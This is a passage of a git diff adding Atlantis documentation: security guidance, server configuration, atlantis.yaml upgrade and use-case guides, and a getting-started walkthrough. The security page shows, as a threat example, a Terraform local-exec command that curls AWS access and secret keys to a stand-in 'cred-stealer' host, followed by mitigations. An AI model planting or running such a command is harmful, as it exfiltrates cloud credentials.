+* `-p project` Apply the plan for this project. Refers to the name of the project configured in the repo's [`atlantis.yaml` file](/docs/atlantis-yaml-reference.html). Cannot be used at same time as `-d` or `-w`.
+* `-w workspace` Apply the plan for this [Terraform workspace](https://www.terraform.io/images/state/workspaces.html). Defaults to `default`. If not using Terraform workspaces you can ignore this.
+* `--verbose` Append Atlantis log to comment.
+
+Additional Terraform flags:
+
+Because Atlantis under the hood is running `terraform apply` on the planfile generated in the previous step, any Terraform options that would change the `plan` are ignored:
+* `-target=resource`
+* `-var 'foo=bar'`
+* `-var-file=myfile.tfvars`
+If you would like to specify these flags, do it while running `atlantis plan`.
diff --git a/runatlantis.io/docs/security.md b/runatlantis.io/docs/security.md
new file mode 100644
index 0000000000..b26da1e6c2
--- /dev/null
+++ b/runatlantis.io/docs/security.md
@@ -0,0 +1,44 @@
+# Security
+[[toc]]
+## Exploits
+Because you usually run Atlantis on a server with credentials that allow access to your infrastructure it's important that you deploy Atlantis securely.
+
+Atlantis could be exploited by
+* Running `terraform apply` on a malicious Terraform file with [local-exec](https://www.terraform.io/docs/provisioners/local-exec.html)
+```tf
+resource "null_resource" "null" {
+ provisioner "local-exec" {
+ command = "curl https://cred-stealer.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+ }
+}
+```
+* Running malicious hook commands specified in an `atlantis.yaml` file.
+* Someone adding `atlantis plan/apply` comments on your valid pull requests causing terraform to run when you don't want it to.
+
+## Mitigations
+### Don't Use On Public Repos
+Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos until Atlantis gets an authentication system.
+
+### Don't Use `--allow-fork-prs`
+If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false)
+because anyone can open up a pull request from their fork to your repo.
+
+### `--repo-whitelist`
+Atlantis requires you to specify a whitelist of repositories it will accept webhooks from via the `--repo-whitelist` flag.
+For example:
+* Specific repositories: `--repo-whitelist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
+* Your whole organization: `--repo-whitelist=github.com/runatlantis/*`
+* Every repository in your GitHub Enterprise install: `--repo-whitelist=github.yourcompany.com/*`
+* All repositories: `--repo-whitelist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
+
+This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
+
+### Webhook Secrets
+Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables.
+Even with the `--repo-whitelist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is whitelisted.
+Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
+
+### SSL/HTTPS
+If you're using webhook secrets but your traffic is over HTTP then the webhook secrets
+could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file`
+flags.
diff --git a/runatlantis.io/docs/server-configuration.md b/runatlantis.io/docs/server-configuration.md
new file mode 100644
index 0000000000..27d1f94de6
--- /dev/null
+++ b/runatlantis.io/docs/server-configuration.md
@@ -0,0 +1,92 @@
+# Server Configuration
+This documentation explains how to configure the Atlantis server and how to deal
+with credentials.
+
+[[toc]]
+
+Configuration for `atlantis server` can be specified via command line flags, environment variables or a YAML config file.
+Config file values are overridden by environment variables which in turn are overridden by flags.
+
+## YAML
+To use a yaml config file, run atlantis with `--config /path/to/config.yaml`.
+The keys of your config file should be the same as the flag, ex.
+```yaml
+---
+gh-token: ...
+log-level: ...
+```
+
+## Environment Variables
+All flags can be specified as environment variables. You need to convert the flag's `-`'s to `_`'s, uppercase all the letters and prefix with `ATLANTIS_`.
+For example, `--gh-user` can be set via the environment variable `ATLANTIS_GH_USER`.
+
+To see a list of all flags and their descriptions run `atlantis server --help`
+
+::: warning
+The flag `--atlantis-url` is set by the environment variable `ATLANTIS_ATLANTIS_URL` **NOT** `ATLANTIS_URL`.
+:::
+
+## AWS Credentials
+Atlantis simply shells out to `terraform` so you don't need to do anything special with AWS credentials.
+As long as `terraform` commands works where you're hosting Atlantis, then Atlantis will work.
+See [https://www.terraform.io/docs/providers/aws/#authentication](https://www.terraform.io/docs/providers/aws/#authentication) for more detail.
+
+### Multiple AWS Accounts
+Atlantis supports multiple AWS accounts through the use of Terraform's
+[AWS Authentication](https://www.terraform.io/docs/providers/aws/#authentication).
+
+If you're using the [Shared Credentials file](https://www.terraform.io/docs/providers/aws/#shared-credentials-file)
+you'll need to ensure the server that Atlantis is executing on has the corresponding credentials file.
+
+If you're using [Assume role](https://www.terraform.io/docs/providers/aws/#assume-role)
+you'll need to ensure that the credentials file has a `default` profile that is able
+to assume all required roles.
+
+[Environment variables](https://www.terraform.io/docs/providers/aws/#environment-variables) authentication
+won't work for multiple accounts since Atlantis wouldn't know which environment variables to execute
+Terraform with.
+
+### Assume Role Session Names
+Atlantis injects the Terraform variable `atlantis_user` and sets it to the GitHub username of
+the user that is running the Atlantis command. This can be used to dynamically name the assume role
+session which would allow you to view the GitHub username associated with the AWS API calls
+being made during a `plan` or `apply` in CloudWatch.
+
+To take advantage of this feature, use Terraform's [built-in support](https://www.terraform.io/docs/providers/aws/#assume-role) for assume role
+and use the `atlantis_user` terraform variable
+
+```hcl
+provider "aws" {
+ assume_role {
+ role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+ session_name = "${var.atlantis_user}"
+ }
+}
+
+variable "atlantis_user" {
+ default = "atlantis_user"
+}
+```
+
+If you're also using the [S3 Backend](https://www.terraform.io/docs/backends/types/s3.html)
+make sure to add the `role_arn` option:
+
+```hcl
+terraform {
+ backend "s3" {
+ bucket = "mybucket"
+ key = "path/to/my/key"
+ region = "us-east-1"
+ role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+ # can't use var.atlantis_user as the session name because
+ # interpolations are not allowed in backend configuration
+ # session_name = "${var.atlantis_user}" WON'T WORK
+ }
+}
+```
+
+Terraform doesn't support interpolations in backend config so you will not be
+able to use `session_name = "${var.atlantis_user}"`. However, the backend assumed
+role is only used for state-related API actions. Any other API actions will be performed using
+the assumed role specified in the `aws` provider and will have the session named as the GitHub user.
+
diff --git a/runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.md b/runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.md
new file mode 100644
index 0000000000..b91a125ed3
--- /dev/null
+++ b/runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.md
@@ -0,0 +1,188 @@
+# Upgrading atlantis.yaml To Version 2
+These docs describe how to upgrade your `atlantis.yaml` file from the format used
+in previous versions to the latest format.
+
+## Single atlantis.yaml
+If you had multiple `atlantis.yaml` files per directory then you'll need to
+consolidate them into a single `atlantis.yaml` file at the root of the repo.
+
+For example, if you had a directory structure:
+```
+.
+├── project1
+│ └── atlantis.yaml
+└── project2
+ └── atlantis.yaml
+```
+
+Then your new structure would look like:
+```
+.
+├── atlantis.yaml
+├── project1
+└── project2
+```
+
+And your `atlantis.yaml` would look something like:
+```yaml
+version: 2
+projects:
+- dir: project1
+ terraform_version: my-version
+ workflow: project1-workflow
+- dir: project2
+ terraform_version: my-version
+ workflow: project2-workflow
+workflows:
+ project1-workflow:
+ ...
+ project2-workflow:
+ ...
+```
+
+We will talk more about `workflows` below.
+
+## Terraform Version
+The `terraform_version` key moved from being a top-level key to being per `project`
+so if before your `atlantis.yaml` was in directory `mydir` and looked like:
+```yaml
+terraform_version: 0.11.0
+```
+
+Then your new config would be:
+```yaml
+version: 2
+projects:
+- dir: mydir
+ terraform_version: 0.11.0
+```
+
+## Workflows
+Workflows are the new way to set all `pre_*`, `post_*` and `extra_arguments`.
+
+Each `project` can have a custom workflow via the `workflow` key.
+```yaml
+version: 2
+projects:
+- dir: .
+ workflow: myworkflow
+```
+
+Workflows are defined as a top-level key:
+```yaml
+version: 2
+projects:
+...
+
+workflows:
+ myworkflow:
+ ...
+```
+
+To start with, determine whether you're customizing commands that happen during
+`plan` or `apply`. You then set that key under the workflow's name:
+```yaml
+...
+workflows:
+ myworkflow:
+ plan:
+ steps:
+ ...
+ apply:
+ steps:
+ ...
+```
+
+If you're not customizing a specific stage then you can omit that key. For example
+if you're only customizing the commands that happen during `plan` then your config
+will look like:
+```yaml
+...
+workflows:
+ myworkflow:
+ plan:
+ steps:
+ ...
+```
+
+### Extra Arguments
+`extra_arguments` is now specified as follows. Given a previous config:
+```yaml
+extra_arguments:
+ - command_name: init
+ arguments:
+ - "-lock=false"
+ - command_name: plan
+ arguments:
+ - "-lock=false"
+ - command_name: apply
+ arguments:
+ - "-lock=false"
+```
+
+Your config would now look like:
+```yaml
+...
+workflows:
+ myworkflow:
+ plan:
+ steps:
+ - init:
+ extra_args: ["-lock=false"]
+ - plan:
+ extra_args: ["-lock=false"]
+ apply:
+ steps:
+ - apply:
+ extra_args: ["-lock=false"]
+```
+
+
+### Pre/Post Commands
+Instead of using `pre_*` or `post_*`, you now can insert your custom commands
+before/after the built-in commands. Given a previous config:
+
+```yaml
+pre_init:
+ commands:
+ - "curl http://example.com"
+# pre_get commands are run when the Terraform version is < 0.9.0
+pre_get:
+ commands:
+ - "curl http://example.com"
+pre_plan:
+ commands:
+ - "curl http://example.com"
+post_plan:
+ commands:
+ - "curl http://example.com"
+pre_apply:
+ commands:
+ - "curl http://example.com"
+post_apply:
+ commands:
+ - "curl http://example.com"
+```
+
+Your config would now look like:
+```yaml
+...
+workflows:
+ myworkflow:
+ plan:
+ steps:
+ - run: curl http://example.com
+ - init
+ - plan
+ - run: curl http://example.com
+ apply:
+ steps:
+ - run: curl http://example.com
+ - apply
+ - run: curl http://example.com
+```
+
+::: tip
+It's important to include the built-in commands: `init`, `plan` and `apply`.
+Otherwise Atlantis won't run the necessary commands to actually plan/apply.
+:::
diff --git a/runatlantis.io/guide/README.md b/runatlantis.io/guide/README.md
new file mode 100644
index 0000000000..32c0f424c3
--- /dev/null
+++ b/runatlantis.io/guide/README.md
@@ -0,0 +1,57 @@
+# Introduction
+
+::: tip Looking for the docs?
+Go here: [www.runatlantis.io/docs](/docs/)
+:::
+
+## Overview
+Atlantis is an application for automating Terraform via pull requests. It is deployed
+as a standalone application into your infrastructure. No third-party has access to
+your credentials.
+
+Atlantis listens for GitHub or GitLab webhooks about Terraform pull requests. It
+then runs `terraform plan` and comments with the output back on the pull request.
+
+When you want to apply, comment `atlantis apply` on the pull request and Atlantis
+will run `terraform apply` and comment back with the output.
+
+Check out the video below to see it in action:
+
+[![Atlantis Walkthrough](./images/atlantis-walkthrough-icon.png)](https://www.youtube.com/watch?v=TmIPWda0IKg)
+
+## Try it out
+If you'd like to try out running Atlantis on an example repo check out the [Test Drive](test-drive.html).
+
+## Why would you run Atlantis?
+### Increased visibility
+When everyone is executing Terraform on their own computers, it's hard to know the
+current state of your infrastructure:
+* Is what's in `master` deployed?
+* Did someone forget to create a pull request for that latest change?
+* What was the output from that last `terraform apply`?
+
+With Atlantis, everything is visible on the pull request. You can view the history
+of everything that was done to your infrastructure.
+
+### Enable collaboration with everyone
+You probably don't want to distribute Terraform credentials to everyone in your
+engineering organization, but now anyone can open up a Terraform pull request.
+
+You can require approval before the pull request is applied so nothing happens
+accidentally.
+
+### Review Terraform pull requests better
+You can't fully review a Terraform change without seeing the output of `terraform plan`.
+Now that output is added to the pull request automatically.
+
+### Standardize your workflows
+Atlantis locks a directory/workspace until the pull request is merged or the lock
+is manually deleted. This ensures that changes are applied in the order expected.
+
+The exact commands that Atlantis runs are configurable. You can run custom scripts
+to construct your ideal workflow.
+
+## Next Steps
+* If you'd like to try out Atlantis on a test repo, check out the [Test Drive](test-drive.html).
+* If you're ready to deploy it on your own repos, check out [Getting Started](getting-started.html).
+* If you're wondering if Atlantis supports how you run Terraform, read [Requirements](requirements.html).
\ No newline at end of file
diff --git a/runatlantis.io/guide/atlantis-yaml-use-cases.md b/runatlantis.io/guide/atlantis-yaml-use-cases.md
new file mode 100644
index 0000000000..f01da6fc38
--- /dev/null
+++ b/runatlantis.io/guide/atlantis-yaml-use-cases.md
@@ -0,0 +1,251 @@
+# atlantis.yaml Use Cases
+
+An `atlantis.yaml` file can be placed in the root of each repository to configure
+how Atlantis runs. This documentation describes some use cases.
+
+::: tip
+Looking for the full atlantis.yaml reference? See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html).
+:::
+
+[[toc]]
+
+## Disabling Autoplanning
+```yaml
+version: 2
+projects:
+- dir: project1
+ autoplan:
+ enabled: false
+```
+This will stop Atlantis automatically running plan when `project1/` is updated
+in a pull request.
+
+## Configuring Autoplanning
+Given the directory structure:
+```
+.
+├── modules
+│ └── module1
+│ ├── main.tf
+│ ├── outputs.tf
+│ └── submodule
+│ ├── main.tf
+│ └── outputs.tf
+└── project1
+ └── main.tf
+```
+If you wanted Atlantis to autoplan `project1/` whenever any `.tf` file under `module1/`
+changed, you could use the following configuration:
+
+```yaml
+version: 2
+projects:
+- dir: project1
+ autoplan:
+ when_modified: ["../modules/**/*.tf", "*.tf"]
+```
+Note:
+* `when_modified` uses the [`.dockerignore` syntax](https://docs.docker.com/engine/reference/builder/#dockerignore-file)
+* The paths are relative to the project's directory.
+
+## Supporting Terraform Workspaces
+```yaml
+version: 2
+projects:
+- dir: project1
+ workspace: staging
+- dir: project1
+ workspace: production
+```
+With the above config, when Atlantis determines that the configuration for the `project1` dir has changed,
+it will run plan for both the `staging` and `production` workspaces.
+
+If you want to `plan` or `apply` for a specific workspace you can use
+```
+atlantis plan -w staging -d project1
+```
+and
+```
+atlantis apply -w staging -d project1
+```
+
+## Using .tfvars files
+Given the structure:
+```
+.
+└── project1
+ ├── main.tf
+ ├── production.tfvars
+ └── staging.tfvars
+```
+
+If you wanted Atlantis to automatically run plan with `-var-file staging.tfvars` and `-var-file production.tfvars`
+you could use the following config:
+
+```yaml
+version: 2
+projects:
+# If two or more projects have the same dir and workspace, they must also have
+# a 'name' key to differentiate them.
+- name: project1-staging
+ dir: project1
+ # NOTE: the key here is 'workflow' not 'workspace'
+ workflow: staging
+- name: project1-production
+ dir: project1
+ workflow: production
+
+workflows:
+ staging:
+ plan:
+ steps:
+ - init
+ - plan:
+ extra_args: ["-var-file", "staging.tfvars"]
+ production:
+ plan:
+ steps:
+ - init
+ - plan:
+ extra_args: ["-var-file", "production.tfvars"]
+```
+Here we're defining two projects with the same directory but with different
+`workflow`s.
+
+If you wanted to manually plan one of these projects you could use
+```
+atlantis plan -p project1-staging
+```
+Where `-p` refers to the project name.
+
+When you want to apply the plan, you can run
+```
+atlantis apply -p project1-staging
+```
+
+::: warning Why can't you use atlantis apply -d project1?
+Because Atlantis outputs the plan for both workflows into the `project1` directory
+so it needs a way to differentiate between the plans.
+:::
+
+## Adding extra arguments to Terraform commands
+If you need to append flags to `terraform plan` or `apply` temporarily, you can
+append flags on a comment following `--`, for example commenting:
+```
+atlantis plan -- -lock=false
+```
+Would cause atlantis to run `terraform plan -lock=false`.
+
+If you always need to do this for a project's `init`, `plan` or `apply` commands
+then you must define the project's steps and set the `extra_args` key for the
+command you need to modify.
+
+```yaml
+version: 2
+projects:
+- dir: project1
+ workflow: myworkflow
+workflows:
+ myworkflow:
+ plan:
+ steps:
+ - init:
+ extra_args: ["-lock=false"]
+ - plan:
+ extra_args: ["-lock=false"]
+ apply:
+ steps:
+ - apply:
+ extra_args: ["-lock=false"]
+```
+
+## Running custom commands
+Atlantis supports running custom commands. In this example, we want to run
+a script after every `apply`:
+
+```yaml
+version: 2
+projects:
+- dir: project1
+ workflow: myworkflow
+workflows:
+ myworkflow:
+ apply:
+ steps:
+ - apply
+ - run: ./my-custom-script.sh
+```
+
+::: tip
+Note how we're not specifying the `plan` key under `myworkflow`. If the `plan` key
+isn't set, Atlantis will use the default plan workflow which is what we want in this case.
+:::
+
+## Terraform Versions
+If you'd like to use a different version of Terraform than what is in Atlantis'
+`PATH` then set the `terraform_version` key:
+
+```yaml
+version: 2
+projects:
+- dir: project1
+ terraform_version: 0.10.0
+```
+
+Atlantis will then execute all Terraform commands with `terraform0.10.0` instead
+of `terraform`. This requires that the 0.10.0 binary is in Atlantis's `PATH` with the
+name `terraform0.10.0`.
+
+## Requiring Approvals For Production
+In this example, we only want to require `apply` approvals for the `production` directory.
+```yaml
+version: 2
+projects:
+- dir: staging
+- dir: production
+ apply_requirements: [approved]
+```
+:::tip
+By default, there are no apply requirements so we only need to specify the `apply_requirements` key for production.
+:::
+
+
+## Custom Backend Config
+If you need to specify the `-backend-config` flag to `terraform init` you'll need to use an `atlantis.yaml` file.
+In this example, we're using custom backend files to configure two remote states, one for each environment.
+We're then using `.tfvars` files to load different variables for each environment.
+
+```yaml
+version: 2
+projects:
+- name: staging
+ dir: .
+ workflow: staging
+- name: production
+ dir: .
+ workflow: production
+workflows:
+ staging:
+ plan:
+ steps:
+ - rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=staging.backend.tfvars]
+ - plan:
+ extra_args: [-var-file=staging.tfvars]
+ production:
+ plan:
+ steps:
+ - rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=production.backend.tfvars]
+ - plan:
+ extra_args: [-var-file=production.tfvars]
+```
+::: warning NOTE
+We have to use a custom `run` step to `rm -rf .terraform` because otherwise Terraform
+will complain in-between commands since the backend config has changed.
+:::
+
+## Next Steps
+Check out the full [`atlantis.yaml` Reference](../docs/atlantis-yaml-reference.html) for more details.
\ No newline at end of file
diff --git a/runatlantis.io/guide/getting-started.md b/runatlantis.io/guide/getting-started.md
new file mode 100644
index 0000000000..d455de04a5
--- /dev/null
+++ b/runatlantis.io/guide/getting-started.md
@@ -0,0 +1,171 @@
+# Getting Started
+These instructions are for running Atlantis locally so you can test it out against
+your own repositories before deciding whether to install it more permanently.
+
+::: tip
+If you want to set up a production-ready Atlantis installation, read [Deployment](../docs/deployment.html).
+:::
+
+Steps:
+
+[[toc]]
+
+## Install Terraform
+`terraform` needs to be in the `$PATH` for Atlantis.
+Download from [https://www.terraform.io/downloads.html](https://www.terraform.io/downloads.html)
+```
+unzip path/to/terraform_*.zip -d /usr/local/bin
+```
+
+## Download Atlantis
+Get the latest release from [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases)
+and unpackage it.
+
+## Download Ngrok
+Atlantis needs to be accessible somewhere that github.com/gitlab.com or your GitHub/GitLab Enterprise installation can reach.
+One way to accomplish this is with ngrok, a tool that forwards your local port to a random
+public hostname.
+
+Go to [https://ngrok.com/download](https://ngrok.com/download), download ngrok and `unzip` it.
+
+Start `ngrok` on port `4141` and take note of the hostname it gives you:
+```bash
+./ngrok http 4141
+```
+
+In a new tab (where you'll soon start Atlantis) create an environment variable with
+ngrok's hostname:
+```bash
+URL=https://{YOUR_HOSTNAME}.ngrok.io
+```
+
+## Create a Webhook Secret
+GitHub and GitLab use webhook secrets so clients can verify that the webhooks came
+from them. Create a random string of any length (you can use [https://www.random.org/strings/](https://www.random.org/strings/))
+and set an environment variable:
+```
+SECRET={YOUR_RANDOM_STRING}
+```
+
+## Add Webhook
+Take the URL that ngrok output and create a webhook in your GitHub or GitLab repo:
+
+### GitHub
+- Go to your repo's settings
+- Select **Webhooks** or **Hooks** in the sidebar
+- Click **Add webhook**
+- set **Payload URL** to your ngrok url with `/events` at the end. Ex. `https://c5004d84.ngrok.io/events`
+- double-check you added `/events` to the end of your URL.
+- set **Content type** to `application/json`
+- set **Secret** to your random string
+- select **Let me select individual events**
+- check the boxes
+ - **Pull request reviews**
+ - **Pushes**
+ - **Issue comments**
+ - **Pull requests**
+- leave **Active** checked
+- click **Add webhook**
+
+### GitLab
+- Go to your repo's home page
+- Click **Settings > Integrations** in the sidebar
+- set **URL** to your ngrok url with `/events` at the end. Ex. `https://c5004d84.ngrok.io/events`
+- double-check you added `/events` to the end of your URL.
+- set **Secret Token** to your random string
+- check the boxes
+ - **Push events**
+ - **Comments**
+ - **Merge Request events**
+- leave **Enable SSL verification** checked
+- click **Add webhook**
+
+## Create an access token for Atlantis
+We recommend using a dedicated CI user or creating a new user named **@atlantis** that performs all API actions, however for testing,
+you can use your own user. Here we'll create the access token that Atlantis uses to comment on the pull request and
+set commit statuses.
+
+### GitHub
+- follow [https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token)
+- create a token with **repo** scope
+- set the token as an environment variable
+```
+TOKEN={YOUR_TOKEN}
+```
+
+### GitLab
+- follow [https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token](https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token)
+- create a token with **api** scope
+- set the token as an environment variable
+```
+TOKEN={YOUR_TOKEN}
+```
+
+## Start Atlantis
+You're almost ready to start Atlantis, just set one more variable:
+
+```
+USERNAME={the username of your GitHub or GitLab user}
+```
+Now you can start Atlantis, the exact command differs depending on your Git Host:
+
+### GitHub
+```
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET
+```
+
+### GitHub Enterprise
+```
+HOSTNAME=YOUR_GITHUB_ENTERPRISE_HOSTNAME # ex. github.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET --gh-hostname $HOSTNAME
+```
+
+### GitLab
+```
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
+```
+
+### GitLab Enterprise
+```
+HOSTNAME=YOUR_GITLAB_ENTERPRISE_HOSTNAME # ex. gitlab.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET --gitlab-hostname $HOSTNAME
+```
+
+## Create a pull request
+Create a pull request so you can test Atlantis.
+::: tip
+You could add a null resource as a test:
+```hcl
+resource "null_resource" "example" {}
+```
+Or just modify the whitespace in a file.
+:::
+
+### Autoplan
+You should see Atlantis logging about receiving the webhook and you should see the output of `terraform plan` on your repo.
+
+Atlantis tries to figure out the directory to plan in based on the files modified.
+If you need to customize the directories that that Atlantis runs in or the commands it runs if you're using workspaces
+or `.tfvars` files, see [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html).
+
+### Manual Plan
+To manually `plan` in a specific directory or workspace, comment on the pull request using the `-d` or `-w` flags:
+```
+atlantis plan -d mydir
+atlantis plan -w staging
+```
+
+To add additional arguments to the underlying `terraform plan` you can use:
+```
+atlantis plan -- -target=resource -var 'foo=bar'
+```
+
+### Apply
+If you'd like to `apply`, type a comment: `atlantis apply`. You can use the `-d` or `-w` flags to point
+Atlantis at a specific plan. Otherwise it tries to apply the plan for the root directory.
+
+## Next Steps
+* You're done! Hopefully Atlantis is working with your repo and you're ready to move on to a [production-ready deployment](../docs/deployment.html).
+* If it's not working as expected, you may need to customize how Atlantis runs with an `atlantis.yaml` file.
+See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html).
+* Check out our full documentation for more details: [Documentation](../docs/).
diff --git a/docs/atlantis-walkthrough-icon.png b/runatlantis.io/guide/images/atlantis-walkthrough-icon.png
similarity index 100%
rename from docs/atlantis-walkthrough-icon.png
rename to runatlantis.io/guide/images/atlantis-walkthrough-icon.png
diff --git a/runatlantis.io/guide/requirements.md b/runatlantis.io/guide/requirements.md
new file mode 100644
index 0000000000..0681a0b93e
--- /dev/null
+++ b/runatlantis.io/guide/requirements.md
@@ -0,0 +1,85 @@
+# Requirements
+
+[[toc]]
+
+## Git Host
+* GitHub (public, private or enterprise)
+* GitLab (public, private or enterprise)
+
+If you would like support for BitBucket, please add a :+1: to [this ticket](https://github.com/runatlantis/atlantis/issues/30)
+and click "Subscribe" to be notified when support is available.
+
+## Remote State
+Atlantis supports all remote state backends. It **does not** support local state
+because it does not commit the modified state files back to version control.
+
+## Repository Structure
+Atlantis supports any Terraform project structures, for example:
+
+### Single Terraform project at repo root
+```
+.
+├── main.tf
+└── ...
+```
+
+### Multiple project folders
+```
+.
+├── project1
+│ ├── main.tf
+| └── ...
+└── project2
+ ├── main.tf
+ └── ...
+```
+
+### Modules
+```
+.
+├── project1
+│ ├── main.tf
+| └── ...
+└── modules
+ └── module1
+ ├── main.tf
+ └── ...
+```
+With modules, if you want `project1` automatically planned when `module1` is modified
+you need to create an `atlantis.yaml` file. See [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#configuring-autoplanning) for more details.
+
+### Terraform Workspaces
+::: tip
+See [Terraform's docs](https://www.terraform.io/docs/state/workspaces.html) if you are unfamiliar with workspaces.
+:::
+If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through an
+`atlantis.yaml` file that tells Atlantis the names of your workspaces
+(see [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#supporting-terraform-workspaces) for more details)
+or through the `-w` flag. For example:
+```
+atlantis plan -w staging
+atlantis apply -w staging
+```
+
+
+### .tfvars Files
+```
+.
+├── production.tfvars
+│── staging.tfvars
+└── main.tf
+```
+For Atlantis to be able to plan automatically with `.tfvars files`, you need to create
+an `atlantis.yaml` file to tell it to use `-var-file={YOUR_FILE}`.
+See [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#using-tfvars-files) for more details.
+
+## Terraform Versions
+By default, Atlantis will use the `terraform` executable that is in its path.
+To use a specific version of Terraform:
+1. Install the desired version of Terraform into the `$PATH` of where Atlantis is
+ running and name it `terraform{version}`, ex. `terraform0.8.8`.
+2. Create an `atlantis.yaml` file for your repo and set the `terraform_version` key.
+See [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#terraform-versions) for more details.
+
+## Next Steps
+Check out our [full documentation](../docs/).
diff --git a/runatlantis.io/guide/test-drive.md b/runatlantis.io/guide/test-drive.md
new file mode 100644
index 0000000000..2b7b884b95
--- /dev/null
+++ b/runatlantis.io/guide/test-drive.md
@@ -0,0 +1,18 @@
+# Test Drive
+To try out running Atlantis yourself first, download the latest release for your architecture:
+[https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases)
+
+Once you've extracted the archive, run:
+```bash
+./atlantis testdrive
+```
+
+This mode sets up Atlantis on a test repo so you can try it out. It will
+- fork an example terraform project into your GitHub account
+- install terraform (if not already in your PATH)
+- install ngrok so we can expose Atlantis to GitHub
+- start Atlantis so you can execute commands on the pull request
+
+## Next Steps
+
+When you're ready to try out Atlantis on your own repos then read [Getting Started](getting-started.html).
diff --git a/website/terraform/main.tf b/runatlantis.io/terraform/main.tf
similarity index 100%
rename from website/terraform/main.tf
rename to runatlantis.io/terraform/main.tf
diff --git a/website/terraform/modules/cloudfront_distribution/main.tf b/runatlantis.io/terraform/modules/cloudfront_distribution/main.tf
similarity index 100%
rename from website/terraform/modules/cloudfront_distribution/main.tf
rename to runatlantis.io/terraform/modules/cloudfront_distribution/main.tf
diff --git a/website/terraform/modules/cloudfront_distribution/outputs.tf b/runatlantis.io/terraform/modules/cloudfront_distribution/outputs.tf
similarity index 100%
rename from website/terraform/modules/cloudfront_distribution/outputs.tf
rename to runatlantis.io/terraform/modules/cloudfront_distribution/outputs.tf
diff --git a/website/terraform/modules/cloudfront_distribution/variables.tf b/runatlantis.io/terraform/modules/cloudfront_distribution/variables.tf
similarity index 100%
rename from website/terraform/modules/cloudfront_distribution/variables.tf
rename to runatlantis.io/terraform/modules/cloudfront_distribution/variables.tf
diff --git a/website/terraform/s3_bucket_policy.json b/runatlantis.io/terraform/s3_bucket_policy.json
similarity index 100%
rename from website/terraform/s3_bucket_policy.json
rename to runatlantis.io/terraform/s3_bucket_policy.json
diff --git a/scripts/e2e.sh b/scripts/e2e.sh
index a1d3a44eea..02c6021658 100755
--- a/scripts/e2e.sh
+++ b/scripts/e2e.sh
@@ -8,7 +8,7 @@ ${CIRCLE_WORKING_DIRECTORY}/scripts/e2e-deps.sh
cd "${CIRCLE_WORKING_DIRECTORY}/e2e"
# start atlantis server in the background and wait for it to start
-./atlantis server --gh-user="$GITHUB_USERNAME" --gh-token="$GITHUB_PASSWORD" --data-dir="/tmp" --log-level="debug" --repo-whitelist="github.com/runatlantis/atlantis-tests" &> /tmp/atlantis-server.log &
+./atlantis server --gh-user="$GITHUB_USERNAME" --gh-token="$GITHUB_PASSWORD" --data-dir="/tmp" --log-level="debug" --repo-whitelist="github.com/runatlantis/atlantis-tests" --allow-repo-config &> /tmp/atlantis-server.log &
sleep 2
# start ngrok in the background and wait for it to start
diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go
deleted file mode 100644
index 0ca0dc044f..0000000000
--- a/server/events/apply_executor.go
+++ /dev/null
@@ -1,150 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
- "os"
- "path/filepath"
-
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/run"
- "github.com/runatlantis/atlantis/server/events/terraform"
- "github.com/runatlantis/atlantis/server/events/vcs"
- "github.com/runatlantis/atlantis/server/events/webhooks"
-)
-
-// ApplyExecutor handles executing terraform apply.
-type ApplyExecutor struct {
- VCSClient vcs.ClientProxy
- Terraform *terraform.DefaultClient
- RequireApproval bool
